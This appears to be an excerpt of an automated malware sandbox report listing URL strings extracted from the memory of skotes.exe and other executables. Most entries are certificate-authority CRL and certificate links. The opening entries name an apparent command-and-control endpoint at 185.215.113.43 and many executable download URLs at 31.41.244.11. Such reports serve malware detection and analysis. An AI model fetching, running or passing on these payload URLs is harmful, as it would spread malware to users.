                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedU
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedd
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedy
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpxe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpxeP
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpxel
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1293295511/UZAj8wc.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1293295511/UZAj8wc.exeXYZ0123456789
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/6069966613/8ZVMneG.exeIv9
                                Source: skotes.exe, 00000003.00000002.7284592983.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.00000000012F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/7781867830/D1UL0FG.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.00000000012F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/7781867830/D1UL0FG.exeXYZ0123456789
                                Source: skotes.exe, 00000003.00000002.7284592983.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/7781867830/D1UL0FG.exeshqos.dll
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/burpin1/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/geopoxid/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/karl/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/loadman/random.exe:
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/loadman/random.exew
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/lolz/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/martin/random.exe0
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique1/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exen
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique3/random.exe
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/wicked/random.exe
                                Source: skotes.exe, 00000003.00000002.7286155793.00000000013CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/wicked/random.exe1
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/wicked/random.exeC:
                                Source: skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/wicked/random.exeLMEMXx
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/x3team/random.exe
                                Source: D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.000002732616F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.000002732616F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.0000027326149000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.0000027326149000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.000002732616F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.000002732616F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                                Source: D1UL0FG.exe, 00000005.00000003.2467389313.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469509352.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467043392.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468668439.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467263006.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466814520.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466518455.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2467489215.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466382775.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468064470.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469715627.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2466690493.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469405557.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                Source: 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
